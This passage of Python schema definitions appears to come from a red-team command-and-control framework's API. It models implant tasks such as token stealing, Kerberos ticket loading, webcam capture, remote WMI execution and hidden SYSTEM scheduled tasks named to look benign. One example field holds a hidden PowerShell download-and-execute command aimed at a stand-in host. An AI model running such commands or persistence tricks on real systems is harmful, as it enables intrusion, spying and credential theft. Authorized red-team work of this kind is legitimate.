arch: Optional[Architecture] = Field(None, description="Process architecture", example="x64")
name: Optional[str] = Field(None, description="Process name", example="cmd.exe", title="Name")
owner: Optional[str] = Field(None, description="Process owner", example="ACME\\John", title="Owner")
path: Optional[str] = Field(
None,
description="Full process path",
example="C:\\Windows\\System32\\cmd.exe",
title="Path",
)
class ProcessExecuteBaseArguments(Schema):
command: str = Field(
...,
description="Full command line string",
example="rundll32.exe mine.dll,export",
title="Command",
)
parent: Optional[str] = Field(
"",
description="Parent process name/id to spawn under (otherwise local)",
example="explorer.exe",
title="Parent",
)
microsoft_only: Optional[bool] = Field(
False,
alias="microsoftOnly",
description="Use process mitigation policies to block the loading of 3rd party code on process start",
example=False,
title="Microsoftonly",
)
class ProcessListArguments(Schema):
verbose: Optional[bool] = Field(
False,
description="Provide verbose information about processes",
example=False,
title="Verbose",
)
class ProcessPowershellArguments(Schema):
command: str = Field(
...,
description="Full command line string",
example="rundll32.exe mine.dll,export",
title="Command",
)
parent: Optional[str] = Field(
"",
description="Parent process name/id to spawn under (otherwise local)",
example="explorer.exe",
title="Parent",
)
microsoft_only: Optional[bool] = Field(
False,
alias="microsoftOnly",
description="Use process mitigation policies to block the loading of 3rd party code on process start",
example=False,
title="Microsoftonly",
)
additional_args: Optional[str] = Field(
None,
alias="additionalArgs",
description="Add arguments to powershell.exe (-nop or -v2)",
example="-nop -exec bypass",
title="Additionalargs",
)
class ProcessShellArguments(Schema):
command: str = Field(
...,
description="Full command line string",
example="rundll32.exe mine.dll,export",
title="Command",
)
parent: Optional[str] = Field(
"",
description="Parent process name/id to spawn under (otherwise local)",
example="explorer.exe",
title="Parent",
)
microsoft_only: Optional[bool] = Field(
False,
alias="microsoftOnly",
description="Use process mitigation policies to block the loading of 3rd party code on process start",
example=False,
title="Microsoftonly",
)
class ProcessStartArguments(Schema):
command: str = Field(
...,
description="Full command line string",
example="rundll32.exe mine.dll,export",
title="Command",
)
parent: Optional[str] = Field(
"",
description="Parent process name/id to spawn under (otherwise local)",
example="explorer.exe",
title="Parent",
)
microsoft_only: Optional[bool] = Field(
False,
alias="microsoftOnly",
description="Use process mitigation policies to block the loading of 3rd party code on process start",
example=False,
title="Microsoftonly",
)
class ProfileInCreate(Schema):
name: str = Field(..., max_length=265, title="Name")
data: Dict[str, Any] = Field(..., title="Data")
class Protocol(str, Enum):
smb = "smb"
http = "http"
https = "https"
dns = "dns"
icmp = "icmp"
class RttPortalAccessStatus(str, Enum):
completed = "completed"
auth_pending = "auth_pending"
auth_required = "auth_required"
class RegistryDeleteArguments(Schema):
path: str = Field(
...,
description="Full registry path",
example="HKEY_LOCAL_MACHINE\\Software",
title="Path",
)
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
value: Optional[str] = Field("", description="Registry sub-value name", example="MyValue", title="Value")
class RegistryQueryArguments(Schema):
path: str = Field(
...,
description="Full registry path",
example="HKEY_LOCAL_MACHINE\\Software",
title="Path",
)
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
value: Optional[str] = Field("", description="Registry sub-value name", example="MyValue", title="Value")
class RegistryType(str, Enum):
reg_none = "REG_NONE"
reg_sz = "REG_SZ"
reg_expand_sz = "REG_EXPAND_SZ"
reg_binary = "REG_BINARY"
reg_dword = "REG_DWORD"
reg_dword_little_endian = "REG_DWORD_LITTLE_ENDIAN"
reg_dword_big_endian = "REG_DWORD_BIG_ENDIAN"
reg_link = "REG_LINK"
reg_multi_sz = "REG_MULTI_SZ"
reg_resource_list = "REG_RESOURCE_LIST"
reg_full_resource_descriptor = "REG_FULL_RESOURCE_DESCRIPTOR"
reg_resource_requirements_list = "REG_RESOURCE_REQUIREMENTS_LIST"
reg_qword = "REG_QWORD"
reg_qword_little_endian = "REG_QWORD_LITTLE_ENDIAN"
class RegistryValue(Schema):
name: str = Field(..., description="Value name", title="Name")
type: RegistryType = Field(..., description="Value type")
data: str = Field(
...,
description="Value data (Base64 for REG_BINARY and '|' to separate MULTI_SZ)",
title="Data",
)
class RoundtripToken(Schema):
token: str = Field(..., title="Token")
verify_url: str = Field(..., alias="verifyUrl", title="Verifyurl")
finish_url: str = Field(..., alias="finishUrl", title="Finishurl")
expires: datetime = Field(..., title="Expires")
class RouteInResponse(Schema):
id: UUID = Field(..., title="Id")
instance_id: UUID = Field(..., alias="instanceId", title="Instanceid")
protocol: Protocol
port: int = Field(..., title="Port")
pipe: str = Field(..., title="Pipe")
timeout: int = Field(..., title="Timeout")
class ScheduledTaskCreateArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
username: Optional[str] = Field(
"",
description="Username for authentication",
example="ACME\\Jason",
title="Username",
)
password: Optional[str] = Field(
"",
description="Password for authentication",
example="Password1",
title="Password",
)
folder: Optional[str] = Field(
"\\",
description="Parent folder for operation",
example="\\Microsoft\\",
title="Folder",
)
task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
command: str = Field(..., description="Command binary to execute", example="cmd.exe", title="Command")
arguments: Optional[str] = Field(
"",
description="Arguments to command binary",
example="/c whoami",
title="Arguments",
)
user: str = Field(
...,
description="User ID for task execution (name, SID, etc)",
example="NT AUTHORITY\\SYSTEM",
title="User",
)
hidden: Optional[bool] = Field(False, description="Mark the task as hidden", example=True, title="Hidden")
high_privilege: Optional[bool] = Field(
False,
alias="highPrivilege",
description="Run with highest privileges",
example=True,
title="Highprivilege",
)
class ScheduledTaskDeleteArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
username: Optional[str] = Field(
"",
description="Username for authentication",
example="ACME\\Jason",
title="Username",
)
password: Optional[str] = Field(
"",
description="Password for authentication",
example="Password1",
title="Password",
)
folder: Optional[str] = Field(
"\\",
description="Parent folder for operation",
example="\\Microsoft\\",
title="Folder",
)
task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
class ScheduledTaskQueryArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
username: Optional[str] = Field(
"",
description="Username for authentication",
example="ACME\\Jason",
title="Username",
)
password: Optional[str] = Field(
"",
description="Password for authentication",
example="Password1",
title="Password",
)
folder: Optional[str] = Field(
"\\",
description="Parent folder for operation",
example="\\Microsoft\\",
title="Folder",
)
task: Optional[str] = Field(
"",
description="Task name (ommit to query folder)",
example="GoogleUpdates",
title="Task",
)
class ScheduledTaskStartArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
username: Optional[str] = Field(
"",
description="Username for authentication",
example="ACME\\Jason",
title="Username",
)
password: Optional[str] = Field(
"",
description="Password for authentication",
example="Password1",
title="Password",
)
folder: Optional[str] = Field(
"\\",
description="Parent folder for operation",
example="\\Microsoft\\",
title="Folder",
)
task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
class ScheduledTaskState(str, Enum):
unknown = "unknown"
disabled = "disabled"
queued = "queued"
ready = "ready"
running = "running"
class ScheduledTaskStopArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
username: Optional[str] = Field(
"",
description="Username for authentication",
example="ACME\\Jason",
title="Username",
)
password: Optional[str] = Field(
"",
description="Password for authentication",
example="Password1",
title="Password",
)
folder: Optional[str] = Field(
"\\",
description="Parent folder for operation",
example="\\Microsoft\\",
title="Folder",
)
task: str = Field(..., description="Task name", example="GoogleUpdates", title="Task")
class SchemaModel(Schema):
pass
class ScreenshotArguments(Schema):
quality: Optional[int] = Field(
25,
description="Capture quality level",
example=25,
ge=1.0,
le=99.0,
title="Quality",
)
class ScriptType(str, Enum):
client = "client"
server = "server"
class SePrivilege(str, Enum):
se_create_token_privilege = "SeCreateTokenPrivilege"
se_assign_primary_token_privilege = "SeAssignPrimaryTokenPrivilege"
se_lock_memory_privilege = "SeLockMemoryPrivilege"
se_increase_quota_privilege = "SeIncreaseQuotaPrivilege"
se_machine_account_privilege = "SeMachineAccountPrivilege"
se_tcb_privilege = "SeTcbPrivilege"
se_security_privilege = "SeSecurityPrivilege"
se_take_ownership_privilege = "SeTakeOwnershipPrivilege"
se_load_driver_privilege = "SeLoadDriverPrivilege"
se_system_profile_privilege = "SeSystemProfilePrivilege"
se_systemtime_privilege = "SeSystemtimePrivilege"
se_profile_single_process_privilege = "SeProfileSingleProcessPrivilege"
se_increase_base_priority_privilege = "SeIncreaseBasePriorityPrivilege"
se_create_pagefile_privilege = "SeCreatePagefilePrivilege"
se_create_permanent_privilege = "SeCreatePermanentPrivilege"
se_backup_privilege = "SeBackupPrivilege"
se_restore_privilege = "SeRestorePrivilege"
se_shutdown_privilege = "SeShutdownPrivilege"
se_debug_privilege = "SeDebugPrivilege"
se_audit_privilege = "SeAuditPrivilege"
se_system_environment_privilege = "SeSystemEnvironmentPrivilege"
se_change_notify_privilege = "SeChangeNotifyPrivilege"
se_remote_shutdown_privilege = "SeRemoteShutdownPrivilege"
se_undock_privilege = "SeUndockPrivilege"
se_sync_agent_privilege = "SeSyncAgentPrivilege"
se_enable_delegation_privilege = "SeEnableDelegationPrivilege"
se_manage_volume_privilege = "SeManageVolumePrivilege"
se_impersonate_privilege = "SeImpersonatePrivilege"
se_create_global_privilege = "SeCreateGlobalPrivilege"
se_trusted_cred_man_access_privilege = "SeTrustedCredManAccessPrivilege"
se_relabel_privilege = "SeRelabelPrivilege"
se_increase_working_set_privilege = "SeIncreaseWorkingSetPrivilege"
se_time_zone_privilege = "SeTimeZonePrivilege"
se_create_symbolic_link_privilege = "SeCreateSymbolicLinkPrivilege"
se_delegate_session_user_impersonate_privilege = "SeDelegateSessionUserImpersonatePrivilege"
class ServerScriptStatus(str, Enum):
stopped = "stopped"
running = "running"
error = "error"
class ServiceCreateArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
service: str = Field(..., description="Service name", example="spoolsv", title="Service")
display_name: Optional[str] = Field(
"",
alias="displayName",
description="Friendly display name",
example="My Service",
title="Displayname",
)
command: str = Field(
...,
description="Command string",
example="C:\\Windows\\service.exe",
title="Command",
)
class ServiceDeleteArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
service: str = Field(..., description="Service name", example="spoolsv", title="Service")
class ServiceErrorControl(str, Enum):
error_ignore = "error_ignore"
error_normal = "error_normal"
error_severe = "error_severe"
error_critical = "error_critical"
class ServiceQueryArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
service: str = Field(..., description="Service name", example="spoolsv", title="Service")
class ServiceStartArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
service: str = Field(..., description="Service name", example="spoolsv", title="Service")
class ServiceStartType(str, Enum):
boot_start = "boot_start"
system_start = "system_start"
auto_start = "auto_start"
demand_start = "demand_start"
disabled = "disabled"
class ServiceState(str, Enum):
stopped = "stopped"
start_pending = "start_pending"
stop_pending = "stop_pending"
running = "running"
continue_pending = "continue_pending"
pause_pending = "pause_pending"
paused = "paused"
class ServiceStopArguments(Schema):
machine: Optional[str] = Field(
"",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
service: str = Field(..., description="Service name", example="spoolsv", title="Service")
class ServiceType(str, Enum):
kernel_driver = "kernel_driver"
file_system_driver = "file_system_driver"
adapter = "adapter"
recognizer_driver = "recognizer_driver"
win32_own_process = "win32_own_process"
win32_share_process = "win32_share_process"
user_own_process = "user_own_process"
user_share_process = "user_share_process"
interactive_process = "interactive_process"
class SessionDetails(Schema):
username: str = Field(..., description="Session username", example="Jason", title="Username")
source: str = Field(..., description="Source hostname", example="SOURCE-PC", title="Source")
active: int = Field(..., description="Active time in minutes", example=30, title="Active")
idle: int = Field(..., description="Idle time in minutes", example=15, title="Idle")
class ShareAddArguments(Schema):
path: str = Field(..., description="UNC path to map", example="\\\\REMOTE\\C$", title="Path")
username: Optional[str] = Field(
"",
description="Username for authentication",
example="ACME\\John",
title="Username",
)
password: Optional[str] = Field(
"",
description="Password for authentication",
example="Password1",
title="Password",
)
class ShareDeleteArguments(Schema):
share: str = Field(..., description="Mapped share name", example="\\\\REMOTE\\C$", title="Share")
class ShareDisplayType(str, Enum):
generic = "generic"
domain = "domain"
server = "server"
share = "share"
file = "file"
group = "group"
network = "network"
root = "root"
share_admin = "share_admin"
directory = "directory"
class ShareListArguments(Schema):
pass
class ShareScope(str, Enum):
connected = "connected"
globalnet = "globalnet"
remembered = "remembered"
recent = "recent"
context = "context"
class ShareType(str, Enum):
any = "any"
disk = "disk"
print = "print"
reserved = "reserved"
unknown = "unknown"
class StdioType(str, Enum):
out = "out"
error = "error"
class TaskArguments(Schema):
pass
class TaskContext(str, Enum):
system = "system"
user = "user"
script = "script"
class TaskDelivery(str, Enum):
invalid = "invalid"
queued = "queued"
delivered = "delivered"
in_progress = "in_progress"
completed = "completed"
blocked = "blocked"
class TaskErrorInfo(Schema):
code: Optional[int] = Field(None, title="Code")
description: Optional[str] = Field(None, title="Description")
os_code: Optional[int] = Field(None, alias="osCode", title="Oscode")
os_description: Optional[str] = Field(None, alias="osDescription", title="Osdescription")
class TaskInfo(Schema):
path: str = Field(..., title="Path")
state: ScheduledTaskState
last_run: str = Field(..., alias="lastRun", title="Lastrun")
last_result: int = Field(..., alias="lastResult", title="Lastresult")
xml: str = Field(..., title="Xml")
class TaskResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class Config:
extra = "allow"
class TaskStatus(str, Enum):
unknown = "unknown"
success = "success"
failure = "failure"
warning = "warning"
critical = "critical"
class TicketInResponse(Schema):
ticket: str = Field(..., title="Ticket")
expires_in: int = Field(..., alias="expiresIn", title="Expiresin")
expires_at: datetime = Field(..., alias="expiresAt", title="Expiresat")
class TimeFormat(str, Enum):
access = "access"
create = "create"
write = "write"
class TokenIntegrity(str, Enum):
untrusted = "untrusted"
low = "low"
medium = "medium"
medium_plus = "medium_plus"
high = "high"
system = "system"
protected = "protected"
secure = "secure"
class TokenLogonArguments(Schema):
username: str = Field(
...,
description="Account username (Accepts 'domain\\user' format)",
title="Username",
)
password: str = Field(..., description="Account password", title="Password")
netonly: Optional[bool] = Field(
False,
description="Use a NETONLY logon type to skip local credential validation",
title="Netonly",
)
store: Optional[bool] = Field(
False,
description="Store the token for internal use and do not apply it to the current thread impersonate",
title="Store",
)
class TokenLogonResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class TokenPrivilegesArguments(Schema):
pass
class TokenPrivilegesResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
privileges: Optional[List[SePrivilege]] = Field(
[],
description="Privileges successfully enabled for the current token",
example=["SeDebugPrivilege", "SeShutdownPrivilege"],
)
class TokenRevertArguments(Schema):
pass
class TokenRevertResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class TokenStealArguments(Schema):
process: str = Field(
...,
description="Target process (name or id) for performing token duplication",
title="Process",
)
class TokenStealResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class Tool(str, Enum):
slingshot = "slingshot"
throwback = "throwback"
downlink = "downlink"
class TransactionInResponse(Schema):
id: UUID = Field(..., title="Id")
created_at: datetime = Field(..., alias="createdAt", title="Createdat")
tool: Tool
protocol: Protocol
source: Optional[str] = Field(None, max_length=256, title="Source")
destination: Optional[str] = Field(None, max_length=256, title="Destination")
details: Optional[Dict[str, Any]] = Field(None, title="Details")
instance_id: Optional[UUID] = Field(None, alias="instanceId", title="Instanceid")
class UserInChangePassword(Schema):
old_password: str = Field(..., alias="oldPassword", max_length=100, title="Oldpassword")
new_password: str = Field(..., alias="newPassword", max_length=100, title="Newpassword")
class UserRole(str, Enum):
admin = "admin"
operator = "operator"
observer = "observer"
class ValidationError(Schema):
loc: List[str] = Field(..., title="Location")
msg: str = Field(..., title="Message")
type: str = Field(..., title="Error Type")
class WmiInstanceCallArguments(Schema):
machine: Optional[str] = Field(
"localhost",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
namespace: Optional[str] = Field(
"ROOT\\CIMV2",
description="Wmi target namespace",
example="ROOT\\CIMV2",
title="Namespace",
)
username: Optional[str] = Field(
"",
description="Username for authentication",
example="ACME\\Jason",
title="Username",
)
password: Optional[str] = Field(
"",
description="Password for authentication",
example="Password1",
title="Password",
)
authority: Optional[str] = Field(
"",
description="Authentication authority",
example="Kerberos:ACME\\HostA",
title="Authority",
)
filter: str = Field(
...,
description="WQL filter string",
example="Select * from Win32_OperatingSystem",
title="Filter",
)
method: str = Field(..., description="Method name", example="Create", title="Method")
parameters: Dict[str, Any] = Field(
...,
description="Method parameters",
example={"CommandLine": "C:\\Windows\\System32\\cmd.exe"},
title="Parameters",
)
class WmiInstanceCallResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
results: Optional[Dict[str, Any]] = Field(
{},
description="Wmi results",
example={
"BootDevice": "\\Device\\HarddiskVolume5",
"BuildNumber": 17134,
"BuildType": "Multiprocessor Free",
"Caption": "Microsoft Windows 10 Pro",
"CodeSet": 1252,
},
title="Results",
)
class WmiProcessCreateArguments(Schema):
machine: Optional[str] = Field(
"localhost",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
namespace: Optional[str] = Field(
"ROOT\\CIMV2",
description="Wmi target namespace",
example="ROOT\\CIMV2",
title="Namespace",
)
username: Optional[str] = Field(
"",
description="Username for authentication",
example="ACME\\Jason",
title="Username",
)
password: Optional[str] = Field(
"",
description="Password for authentication",
example="Password1",
title="Password",
)
authority: Optional[str] = Field(
"",
description="Authentication authority",
example="Kerberos:ACME\\HostA",
title="Authority",
)
command: str = Field(
...,
description="Command line string",
example="C:\\Windows\\System32\\cmd.exe /C ipconfig",
title="Command",
)
class WmiProcessCreateResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
results: Optional[Dict[str, Any]] = Field(
{},
description="Wmi results",
example={
"BootDevice": "\\Device\\HarddiskVolume5",
"BuildNumber": 17134,
"BuildType": "Multiprocessor Free",
"Caption": "Microsoft Windows 10 Pro",
"CodeSet": 1252,
},
title="Results",
)
class WmiQueryArguments(Schema):
machine: Optional[str] = Field(
"localhost",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
namespace: Optional[str] = Field(
"ROOT\\CIMV2",
description="Wmi target namespace",
example="ROOT\\CIMV2",
title="Namespace",
)
username: Optional[str] = Field(
"",
description="Username for authentication",
example="ACME\\Jason",
title="Username",
)
password: Optional[str] = Field(
"",
description="Password for authentication",
example="Password1",
title="Password",
)
authority: Optional[str] = Field(
"",
description="Authentication authority",
example="Kerberos:ACME\\HostA",
title="Authority",
)
filter: str = Field(
...,
description="WQL filter string",
example="Select * from Win32_OperatingSystem",
title="Filter",
)
class WmiQueryResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
results: Optional[List[Dict[str, Any]]] = Field(
[{}],
description="Wmi results",
example=[
{
"BootDevice": "\\Device\\HarddiskVolume5",
"BuildNumber": 17134,
"BuildType": "Multiprocessor Free",
"Caption": "Microsoft Windows 10 Pro",
"CodeSet": 1252,
}
],
title="Results",
)
class WmiStaticCallArguments(Schema):
machine: Optional[str] = Field(
"localhost",
description="Remote hostname or IP address (otherwise local)",
example="ADAM-PC",
title="Machine",
)
namespace: Optional[str] = Field(
"ROOT\\CIMV2",
description="Wmi target namespace",
example="ROOT\\CIMV2",
title="Namespace",
)
username: Optional[str] = Field(
"",
description="Username for authentication",
example="ACME\\Jason",
title="Username",
)
password: Optional[str] = Field(
"",
description="Password for authentication",
example="Password1",
title="Password",
)
authority: Optional[str] = Field(
"",
description="Authentication authority",
example="Kerberos:ACME\\HostA",
title="Authority",
)
class_: str = Field(
...,
alias="class",
description="Full class name",
example="Win32_Process",
title="Class",
)
method: str = Field(..., description="Method name", example="Create", title="Method")
parameters: Dict[str, Any] = Field(
...,
description="Method parameters",
example={"CommandLine": "C:\\Windows\\System32\\cmd.exe"},
title="Parameters",
)
class WmiStaticCallResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
results: Optional[Dict[str, Any]] = Field(
{},
description="Wmi results",
example={
"BootDevice": "\\Device\\HarddiskVolume5",
"BuildNumber": 17134,
"BuildType": "Multiprocessor Free",
"Caption": "Microsoft Windows 10 Pro",
"CodeSet": 1252,
},
title="Results",
)
class BlobReferenceOrData(Schema):
id: Optional[str] = Field(None, description="Blob identifier", title="Id")
name: Optional[str] = Field(None, description="Contextual name", title="Name")
data: Optional[bytes] = Field(None, description="Raw data", title="Data")
hint: Optional[ContentHint] = Field(None, description="Content data type hint")
size: Optional[int] = Field(0, description="Data size", title="Size")
class CameraCaptureResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
data: Optional[BlobReferenceOrData] = Field(
{"id": "null", "size": 0},
description="JPEG data from camera",
example="EXAMPLE_JPEG",
title="Data",
)
class CameraListResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
cameras: Optional[List[Camera]] = Field(
[],
description="List of available cameras",
example=[{"id": 1, "name": "Logitech C120"}],
title="Cameras",
)
class ContextIdleResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
minutes: Optional[int] = Field(
0,
description="Minutes the current user session has been idle",
example=15,
title="Minutes",
)
class ContextProcessResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
process_id: Optional[int] = Field(
0,
alias="processId",
description="Current process id",
example=1234,
title="Processid",
)
architecture: Optional[Architecture] = Field("x64", description="Current process architecture", example="x64")
path: Optional[str] = Field(
"",
description="Process binary path",
example="C:\\Software\\Slingshot.exe",
title="Path",
)
user_id: Optional[str] = Field(
"",
alias="userId",
description="Token domain and username",
example="ACME\\Jason",
title="Userid",
)
class ContextUserResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
domain: Optional[str] = Field("", description="Token domain name", example="ACME", title="Domain")
username: Optional[str] = Field("", description="Token user name", example="Jason", title="Username")
netonly: Optional[bool] = Field(False, description="NETWORK_ONLY logon type", example=False, title="Netonly")
sid: Optional[str] = Field(
None,
description="Security identifier",
example="S-1-5-21-559599230-1559177840-3308743733-1004",
title="Sid",
)
integrity: Optional[TokenIntegrity] = Field(None, description="Token integrity", example="medium")
class ExitResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class FileChangeDirectoryResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
directory: Optional[str] = Field("", description="Current directory", example="C:\\Users", title="Directory")
class FileCopyResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class FileDownloadResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
data: Optional[BlobReferenceOrData] = Field(
{"id": "null", "size": 0},
description="File data from remote filesystem",
example="EXAMPLE_DATA",
title="Data",
)
class FileListArguments(Schema):
directory: Optional[str] = Field(
".\\",
description="Directory path (supports environment variables)",
example="C:\\Windows",
title="Directory",
)
time_format: Optional[TimeFormat] = Field(
"access",
alias="timeFormat",
description="Time detail to request",
example="access",
)
class FileListResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
entries: Optional[List[FileOrDirectory]] = Field(
[],
description="Directory entires",
example=[
{"name": "Windows", "isDir": True, "time": "2000-01-02T03:04:05"},
{"name": "System32", "isDir": True, "time": "2000-01-02T03:04:05"},
{
"name": "root.dat",
"isDir": False,
"time": "2000-01-02T03:04:05",
"size": 7344321,
},
{
"name": "page.sys",
"isDir": False,
"time": "2000-01-02T03:04:05",
"size": 5134,
},
],
title="Entries",
)
class FileMakeDirectoryResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class FileMoveResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class FileRemoveDirectoryResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class FileRemoveResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class FileUploadResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class HttpValidationError(Schema):
detail: Optional[List[ValidationError]] = Field(None, title="Detail")
class HostFileArguments(Schema):
encoding: Optional[HostingEncoding] = Field("base64", description="Encoding for binary data", example="base64")
base_url: Optional[str] = Field(
"",
alias="baseUrl",
description="Base URL (default is from profile)",
example="http://mycustom.com",
title="Baseurl",
)
endpoint: str = Field(
...,
description="Web endpoint path to host data",
example="/custom",
title="Endpoint",
)
data: BlobReferenceOrData = Field(..., description="Data or blob to host", title="Data")
class HostFileResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
url: Optional[str] = Field(
"",
description="Final URL path for hosting",
example="http://server.com/sub/path",
title="Url",
)
class HostPowershellResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
command: Optional[str] = Field(
"",
description="Command line for execution",
example="powershell.exe -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://server.com/sub/path'))\"",
title="Command",
)
class HostShellcodeResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
url: Optional[str] = Field(
"",
description="Final URL path for hosting",
example="http://server.com/sub/path",
title="Url",
)
class HostUnloadResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class InfoResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
machine_name: Optional[str] = Field(
"",
alias="machineName",
description="Machine hostname",
example="EXAMPLE-PC",
title="Machinename",
)
architecture: Optional[str] = Field(
"",
description="Current process architecture",
example="x64",
title="Architecture",
)
os_version: Optional[str] = Field(
"",
alias="osVersion",
description="Operating system version",
example="10.0.19041 [10 20H1]",
title="Osversion",
)
user_id: Optional[str] = Field(
"",
alias="userId",
description="Token domain and username",
example="ACME\\John",
title="Userid",
)
class InjectResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class InstanceInResponse(Schema):
id: UUID = Field(..., title="Id")
tool: Tool
tag: str = Field(..., max_length=50, title="Tag")
name: str = Field(..., max_length=100, title="Name")
hidden: bool = Field(..., title="Hidden")
updated_at: datetime = Field(..., alias="updatedAt", title="Updatedat")
created_at: datetime = Field(..., alias="createdAt", title="Createdat")
machine_name: str = Field(..., alias="machineName", max_length=256, title="Machinename")
architecture: str = Field(..., max_length=100, title="Architecture")
os_name: str = Field(..., alias="osName", max_length=100, title="Osname")
os_version: str = Field(..., alias="osVersion", max_length=100, title="Osversion")
context: str = Field(..., max_length=256, title="Context")
user_name: str = Field(..., alias="userName", max_length=256, title="Username")
last_transaction: Optional[TransactionInResponse] = Field(None, alias="lastTransaction")
routes: Optional[List[RouteInResponse]] = Field([], title="Routes")
class KerberosLoadArguments(Schema):
ticket: BlobReferenceOrData = Field(
...,
description="Kerberos ticket data",
example="EXAMPLE_TICKET_DATA",
title="Ticket",
)
class KerberosLoadResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
description="Additional error information if the tasking has failed",
title="Errorinfo",
)
class KerberosPurgeResults(Schema):
error_info: Optional[TaskErrorInfo] = Field(
None,
alias="errorInfo",
